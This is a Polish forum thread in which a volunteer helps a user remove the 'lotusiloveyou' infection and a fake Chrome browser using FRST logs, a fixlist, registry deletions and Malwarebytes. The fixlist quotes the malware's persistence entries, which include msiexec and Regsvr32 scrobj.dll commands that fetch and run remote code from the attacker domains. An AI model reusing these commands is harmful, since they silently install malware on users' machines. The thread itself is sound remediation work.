Jak usunąć URL:Mal "lotusiloveyou"

[grisz218]

Witam,
To mój pierwszy post na tym forum. Od kilku dni mam problem - avast ciągle wyświetla monity o malware "llotusiloveyou". Z monitu wynika, że jest on związany z procesem Regserv32. Skanowanie nic nie daje, nie usuwa niczego. Zgodnie z informacją na forum przeskanowałem komputer za pomocą FRST i GMER-a, AdwCleanera gmera nie mogę załączyć bo wyskakuje ze nie mam uprawnień ale  jak będzie potrzebne to podam jakoś

proszę o pomoc

pozdrawiam

Addition.txt

AdwCleanerS0.txt

FRST.txt

Shortcut.txt

[Miszel03]

System jest zainfekowany tą wyjątkową sławną infekcją w ostatnim czasie, oprócz tego dochodzi jeszcze wątpliwy skaner, fałszywa przeglądarka podszywająca się pod Google Chrome i ogólny nieład. 

 

1. Przez panel sterowania odinstaluj:

• Wątpliwe skanery / oprogramowanie: YAC(Yet Another Cleaner!).

2. Otwórz Notatnik w nim wklej: 

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== /q
CHR StartupUrls: Default -> "hxxp://feed.helperbar.com/?publisher=OC&dpid=OC&co=PL&userid=fcbbdada-8d0f-4e30-81d6-78bc5b3f5fb7&affid=113129&searchtype=hp&babsrc=lnkry","hxxp://www.interia.pl/#utm_source=instalki1&utm_medium=installer&utm_campaign=instalki1&iwa_source=installer_instalki","hxxp://www.omniboxes.com/?type=hp&ts=1453675607&z=ba7d726f9838c2429ec3b41gaz6w9cfq2m5wbq7efm&from=amt&uid=wdcxwd10jpcx-24ue4t0_wd-wxm1e83vhj92vhj92"
HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Boxbob
RemoveDirectory: C:\Users\Arczi\AppData\Local\Boxbob
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () 
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Arczi\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Arczi\AppData\Local\Firefox
R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [108544 2017-04-21] () [brak podpisu cyfrowego] 
U3 kxldrpob; \??\C:\Users\Arczi\AppData\Local\Temp\kxldrpob.sys [X] 
HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) 
Task: {39AB3992-685C-4C43-BF2B-267874318720} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== scrobj.dll
Task: {BCA1E17D-E930-47CC-A8D9-AF0F275A907B} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{28F4CBD1-61EB-4D72-B858-FD0972534239}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe
FirewallRules: [{C5F00FDE-B5CF-49D8-8B76-81C27025C315}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{F6C7D29A-DFC8-45CD-8919-1056F46D94F2}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Arczi\AppData\Local\Mozilla
C:\Users\Arczi\AppData\Roaming\Mozilla
C:\Users\Arczi\AppData\Roaming\Profiles
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
• Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
• Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin
• Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 

4. Pomimo wszczęsniejszych akcji z AdwaCleaner: pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania.

 

5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

boxbob;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

 

6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

[grisz218]

Wszystkie zalecenia wykonałem załączam pliki.

AdwCleanerC0.txt

Addition.txt

Fixlog.txt

FRST.txt

SearchReg.txt

Shortcut.txt

[Miszel03]

Do kasacji szczątkowe klucze od fałszywej przeglądarki. Przeprowadzimy końcowy skan, podsumujemy wyniki i będziemy kończyć. 
 
1. Start narzędzia komend.

• Kliknij jednocześnie klawisz  oraz R. Uruchomi się narzędzie Uruchamianie.
• W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER.
• Uruchomi się okno konsoli komend. 

2. Użycie odpowiednich komend.

• W oknie konsoli komend wklej poniższą komendę. 

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Boxbob" /f
reg delete "HKEY_USERS\S-1-5-21-1625667741-3387903260-1302171998-1001\SOFTWARE\Boxbob" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Firefox" /f

reg delete "HKEY_USERS\S-1-5-21-1625667741-3387903260-1302171998-1001\SOFTWARE\Firefox" /f

• Rozpocznie się kasacji kluczy, czekaj, a gdy proces dobiegnie końca uruchom ponownie system.

3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

 

4. Podsumuj obecny stan systemu.

[grisz218]

wstawiłem komendę usuwanie powiodło się wstawiam raport ze skanu coś tam wykryło system działa dobrze nie wyskakuje powiadomienia o 

lotusiloveyou w przeglądarce nie otwierają się jakieś dziwne strony reklamy wszystko idzie w dobra stronę

mawarebytes.txt

[Miszel03]

Wszystkie detekcja daj do usuwania. Następnie zmień hasła we wszystkich serwisach logowania, a szczególnie w banku. Martwą mnie te detekcje: Trojan.WisdomEyes / Trojan.Downloader.D.Generic, ale zakładam, że MBAM usunął je pomyślnie. 

 

Kończymy, ale proszę na bieżąco obserwować system. 

 

Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Uaktualni również bazy oprogramowania zabezpieczającego i wykonaj nim pełne skanowanie systemu (raczej już nic nie powinno być wykryte).

[grisz218]

wszystko osunięto pomyślnie zastosował delfix sprawdziłem aktualizacje pozmieniałem hasła pousuwałem punkty przywracania przeskanowałem nic nie wykryto dziękuje bardzo za pomoc

można zamykać temat

pozdrawiam

[Miszel03]

OK.

 

P.S: Ja raczej nie mam zwyczaju zamykania tematu.